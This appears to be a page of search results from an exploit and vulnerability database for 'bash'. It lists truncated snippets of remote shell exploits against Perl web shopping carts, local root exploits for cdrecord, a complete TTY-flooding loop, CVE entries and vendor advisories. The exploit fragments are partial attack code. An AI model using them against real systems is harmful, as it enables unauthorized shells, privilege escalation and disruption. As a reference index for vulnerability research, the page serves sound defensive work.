2646 matches found
GFHost PHP GMail - Remote Command Execution
GFHost PHP GMail - Remote Command Execution GFHost explo Spawn bash style Shell with webserver uid Greetz SPAX, foxtwo, Zone-H This Script is currently under development use strict; use IO::Socket; my $host; my $port; my $command; my $url; my @results; my $probe; my @U; $U1 =...
GFHost PHP GMail Remote Command Execution Exploit
Exploit for unknown platform in category web applications ================================================= GFHost PHP GMail Remote Command Execution Exploit ================================================= GFHost explo Spawn bash style Shell with webserver uid Greetz SPAX, foxtwo, Zone-H This...
GFHost.pl
GFHost explo Spawn bash style Shell with webserver uid Greetz SPAX, foxtwo, Zone-H This Script is currently under development use strict; use IO::Socket; my $host; my $port; my $command; my $url; my @results; my $probe; my @U; $U1 =...
USN-28-1: sudo vulnerability
Liam Helmer discovered an input validation flaw in sudo. When the standard shell "bash" starts up, it searches the environment for variables with a value beginning with "()". For each of these variables a function with the same name is created, with the function body filled in from the environment...
technote.pl
Technote Inc. from Korea Command Execution Spawn bash style Shell with webserver uid This Script is currently under development use strict; use IO::Socket; my $host; my $port; my $command; my $url; my $pdf; my $url1; my $number; my $url2; my $shiz; my @results; my $probe; my @U; $U1 =...
sudo -- privilege escalation with bash scripts
A Sudo Security Alert reports: A flaw exists in sudo's environment sanitizing prior to sudo version 1.6.8p2 that could allow a malicious user with permission to run a shell script that utilized the bash shell to run arbitrary commands...
Unpassworded 'bash' Backdoor Account
The account 'bash' has no password set. An attacker may use it to gain further privileges on this system. This account was likely created by a backdoor installed by a fake Linux RedHat patch. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. include'deprecatednasllevel.inc'; include'compat.inc...
CDRecord's ReadCD - Local Privilege Escalation
!/bin/bash echo "readcd-exp.sh -- ReadCD local exploit Test on cdrecord-2.01-0.a27.2mdk" echo "Author : newbug at chroot.org" echo "Date :09.13.2004" echo "IRC : irc.chroot.org discuss" export READCD=/usr/bin/readcd cd /tmp cat s.c include include int main setuid0;setgid0; chown"/tmp/ss", 0, 0;...
cdrecord $RSH exec() SUID Shell Creation
Exploit for linux platform in category local exploits ======================================== cdrecord $RSH exec SUID Shell Creation ======================================== !/bin/bash cdrecord-suidshell.sh - Iruid CAU 09.2004 Exploits cdrecord's exec of $RSH before dropping privs cat...
WebCart.pl
WebCart exploit Spawn bash style Shell with webserver uid Spabam 2003 PRIV8 code hackarena irc.brasnet.org This Script is currently under development use strict; use IO::Socket; my $host; my $port; my $command; my $url; my @results; my $probe; my @U; my $shit; $U1 =...
ShopCart.pl
Shopcart exploit Spawn bash style Shell with webserver uid Spabam 2003 PRIV8 code hackarena irc.brasnet.org This Script is currently under development use strict; use IO::Socket; my $host; my $port; my $command; my $url; my @results; my $probe; my @U; my $shit; $U1 = "/cgi-local/shop.pl/page=;";...
cpanel.pl
cpanel-plus.pl exploit Spawn bash style Shell on Apache CPANEL Spabam 2003 PRIV8 code hackarena irc.brasnet.org This Script is currently under development use strict; use IO::Socket; my $host; my $port; my $command; my $url; my @results; my $probe; my @U; my $shit; $U1 =...
Restricted Shells
I have recently realized a security issue in some of the restricted shells on NIX systems. I am not sure if I am the first one to discover the problem I am going to discuss but I am sure that it has not been posted yet, at least not that I know of. Basically this is the issue: Affected Systems:...
CVE-1999-1048
Buffer overflow in bash 2.0.0, 1.4.17, and other versions allows local attackers to gain privileges by creating an extremely large directory name, which is inserted into the password prompt via the \w option in the PS1 environmental variable when another user changes into that directory...
CVE-1999-1048
CVE-1999-1048 affects Bash versions including 2.0.0 and 1.4.17, where a buffer overflow can be triggered by an extremely large directory name. The vulnerability is exploited via the PS1 prompt (\w) when another user changes into that directory, enabling local privilege escalation. The provided do...
CVE-1999-1383
(1) bash before 1.14.7, and (2) tcsh 6.05 allow local users to gain privileges via directory names that contain shell metacharacters (back-tick), which can cause the commands enclosed in the directory name to be executed when the shell expands filenames using the \w option in the PS1 variable...
CVE-1999-1383
CVE-1999-1383 affects bash (before 1.14.7) and tcsh (6.05). The vulnerability arises when a directory name contains shell metacharacters (back-tick) that are expanded during filename expansion for the PS1 variable, allowing local users to gain privileges. Affects local privilege escalation via di...
Symlinks symlinks...this time KTVision
Hi ppl, the subject already states the problem: there is a symlink follow problem in the in many distributions suid root ktvision binary = 0.1.1-271. It is discouraging that nowadays such trivial symlink attacks are still possible. No comment anymore. In order to be complete: a bash script...
FreeBSD-SA-01:03.bash1
-----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:03 Security Advisory FreeBSD, Inc. Topic: bash1 creates insecure temporary files Category: ports Module: bash1 Announced: 2001-01-15 Affects: Ports collection prior to th...
RedHat 6.1/6.2 - TTY Flood Users
!/bin/bash by teleh0r TTYDIR=/dev/pts NONSENSE=/bin/nice MYTTY=tty To prevent flooding of one's own TTY while /bin/true ; do for i in $TTYDIR/ ; do if -w $i -a -c $i -a $i != $MYTTY ; then cat $NONSENSE $i fi done done unset i milw0rm.com 2001-01-02...